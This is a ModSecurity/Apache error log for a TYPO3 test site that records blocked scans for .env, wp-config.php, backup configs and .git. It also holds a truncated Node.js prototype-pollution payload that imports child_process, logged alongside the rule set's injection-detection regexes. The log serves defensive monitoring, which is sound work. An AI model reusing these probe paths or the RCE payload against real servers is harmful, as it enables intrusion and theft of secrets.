[Sun Jan 25 15:13:19.819734 2026] [:error] [pid 1648532] [client 185.177.72.60:40602] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aXYk_8PNWhLVoxYUj4bEiAAAAAg"]
[Sun Jan 25 15:13:19.819915 2026] [:error] [pid 1648532] [client 185.177.72.60:40602] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aXYk_8PNWhLVoxYUj4bEiAAAAAg"]
[Sun Jan 25 15:13:19.820058 2026] [:error] [pid 1648532] [client 185.177.72.60:40602] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aXYk_8PNWhLVoxYUj4bEiAAAAAg"]
[Sun Jan 25 15:13:19.823071 2026] [authz_core:error] [pid 1648533] [client 185.177.72.60:40576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Sun Jan 25 15:13:19.828883 2026] [:error] [pid 1639914] [client 185.177.72.60:40618] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aXYk_-GbQU28xhMFmbpuHgAAAAI"]
[Sun Jan 25 15:13:19.829057 2026] [:error] [pid 1639914] [client 185.177.72.60:40618] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aXYk_-GbQU28xhMFmbpuHgAAAAI"]
[Sun Jan 25 15:13:19.829208 2026] [:error] [pid 1639914] [client 185.177.72.60:40618] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aXYk_-GbQU28xhMFmbpuHgAAAAI"]
[Sun Jan 25 15:13:21.093587 2026] [:error] [pid 1649090] [client 185.177.72.60:40636] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aXYlAR0Fe1OM1hqwEuDrMwAAAAU"]
[Sun Jan 25 15:13:21.093834 2026] [:error] [pid 1649090] [client 185.177.72.60:40636] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aXYlAR0Fe1OM1hqwEuDrMwAAAAU"]
[Sun Jan 25 15:13:21.094001 2026] [:error] [pid 1649090] [client 185.177.72.60:40636] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aXYlAR0Fe1OM1hqwEuDrMwAAAAU"]
[Sun Jan 25 15:13:21.095207 2026] [authz_core:error] [pid 1649091] [client 185.177.72.60:40634] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Mon Jan 26 02:54:39.470722 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Rule 7fd71b676898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 02:54:39.470800 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Rule 7fd71b66b760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 02:54:39.472535 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 02:54:39.472678 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Rule 7fd71ae4abf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 02:54:39.472838 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 02:54:39.472997 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 02:54:39.474897 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Rule 7fd71b2c2320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 02:54:39.475052 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Rule 7fd71b2b9030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 02:54:39.481732 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 02:54:39.481907 2026] [:error] [pid 1659773] [client 34.171.226.229:22110] [client 34.171.226.229] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXbJX3wS_I9XFNsW7-EHZwAAAAo"]
[Mon Jan 26 19:22:42.785684 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXew8p1jjNcCpY8jYJaOywAAAAw"]
[Mon Jan 26 19:22:42.785865 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXew8p1jjNcCpY8jYJaOywAAAAw"]
[Mon Jan 26 19:22:42.786035 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXew8p1jjNcCpY8jYJaOywAAAAw"]
[Mon Jan 26 19:22:42.995435 2026] [authz_core:error] [pid 1670859] [client 195.178.110.132:32880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Mon Jan 26 19:22:43.016693 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXew851jjNcCpY8jYJaO0AAAAAw"]
[Mon Jan 26 19:22:43.016842 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXew851jjNcCpY8jYJaO0AAAAAw"]
[Mon Jan 26 19:22:43.016976 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXew851jjNcCpY8jYJaO0AAAAAw"]
[Mon Jan 26 19:22:43.037857 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXew851jjNcCpY8jYJaO0QAAAAw"]
[Mon Jan 26 19:22:43.038030 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXew851jjNcCpY8jYJaO0QAAAAw"]
[Mon Jan 26 19:22:43.038167 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXew851jjNcCpY8jYJaO0QAAAAw"]
[Mon Jan 26 19:22:43.059335 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXew851jjNcCpY8jYJaO0gAAAAw"]
[Mon Jan 26 19:22:43.059503 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXew851jjNcCpY8jYJaO0gAAAAw"]
[Mon Jan 26 19:22:43.059639 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXew851jjNcCpY8jYJaO0gAAAAw"]
[Mon Jan 26 19:22:43.080437 2026] [authz_core:error] [pid 1670859] [client 195.178.110.132:32880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jan 26 19:22:43.101600 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXew851jjNcCpY8jYJaO1AAAAAw"]
[Mon Jan 26 19:22:43.101749 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXew851jjNcCpY8jYJaO1AAAAAw"]
[Mon Jan 26 19:22:43.101905 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXew851jjNcCpY8jYJaO1AAAAAw"]
[Mon Jan 26 19:22:43.122923 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXew851jjNcCpY8jYJaO1QAAAAw"]
[Mon Jan 26 19:22:43.123042 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXew851jjNcCpY8jYJaO1QAAAAw"]
[Mon Jan 26 19:22:43.123193 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXew851jjNcCpY8jYJaO1QAAAAw"]
[Mon Jan 26 19:22:43.123345 2026] [:error] [pid 1670859] [client 195.178.110.132:32880] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXew851jjNcCpY8jYJaO1QAAAAw"]
[Mon Jan 26 19:22:43.181785 2026] [authz_core:error] [pid 1670859] [client 195.178.110.132:32880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Mon Jan 26 19:22:43.314752 2026] [authz_core:error] [pid 1670859] [client 195.178.110.132:32880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
